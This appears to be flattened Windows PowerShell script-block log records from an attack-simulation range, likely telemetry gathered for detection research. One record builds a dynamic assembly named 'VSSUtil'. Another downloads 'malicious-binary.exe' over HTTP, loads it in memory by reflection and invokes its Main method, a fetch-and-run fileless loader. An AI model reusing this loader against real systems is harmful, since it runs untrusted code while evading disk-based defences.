4104132150x0218663Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-97911 $DynAssembly = New-Object System.Reflection.AssemblyName('VSSUtil') $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VSSUtil', $False)559f7fc6-ca9e-4318-9449-22e25a22d488 4104132150x04991782Microsoft-Windows-PowerShell/Operationalar-win.nas.domain11$assembly = [System.Reflection.Assembly]::Load((Invoke-WebRequest 'http://127.0.0.1/malicious-binary.exe' -UseBasicParsing).Content) $null = $assembly.GetTypes() $method = $assembly.GetType('MaliciousProgram').GetMethod('Main', [System.Reflection.BindingFlags]'Static, Public, NonPublic') $null = $method.Invoke($null, @())d822f734-f366-4265-b1ee-ba2e13ef4040C:\Users\Administrator\Downloads\reflection-assembly.ps1